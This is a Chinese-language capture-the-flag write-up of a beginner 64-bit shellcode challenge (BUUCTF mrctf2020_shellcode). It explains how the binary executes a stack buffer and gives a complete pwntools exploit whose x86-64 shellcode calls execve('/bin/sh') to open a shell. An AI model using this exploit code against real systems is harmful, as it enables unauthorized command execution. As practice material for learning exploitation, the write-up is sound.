BUUCTF--mrctf2020_shellcode1

这是一题64位的shellocde题,没啥花招入门题。看下保护:


有可执行的段。接着我们看看IDA:


主函数中无法反汇编,那么我们直接看汇编代码。其实很简单,通过系统调用执行puts函数,然后执行read函数。


正在我想如何覆盖返回地址的时候,发现题目直接帮你搞好了。取buf的的地址(栈上)然后跳转到buf位置执行代码。那么我们直接通过read函数构造shellcode就完成了:

python 复制代码
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
io=process('./mrctf2020_shellcode')

shellcode = '''
    mov rbx,0x68732f6e69622f
    push rbx
    push rsp
    pop rdi
    xor esi,esi
    xor edx,edx
    push 0x3b
    pop rax
    syscall
'''


shellcode=asm(shellcode)

io.recvuntil("magic!")

io.sendline(shellcode)

io.interactive()
相关推荐
爱编码的傅同学14 分钟前
【常见锁的概念】死锁的产生与避免
java·开发语言
Tansmjs26 分钟前
实时数据可视化库
开发语言·c++·算法
WBluuue29 分钟前
Codeforces 1075 Div2(ABC1C2D1D2)
c++·算法
添砖java‘’32 分钟前
线程的互斥与同步
linux·c++·操作系统·线程·信息与通信
我什么都学不会34 分钟前
Python练习作业3
开发语言·python
2401_838472511 小时前
C++模拟器开发实践
开发语言·c++·算法
初九之潜龙勿用1 小时前
C# 操作Word模拟解析HTML标记之背景色
开发语言·c#·word·.net·office
3108748761 小时前
0005.C/C++学习笔记5
c语言·c++·学习
froginwe111 小时前
MySQL UNION 操作详解
开发语言
ruxshui1 小时前
Python多线程环境下连接对象的线程安全管理规范
开发语言·数据库·python·sql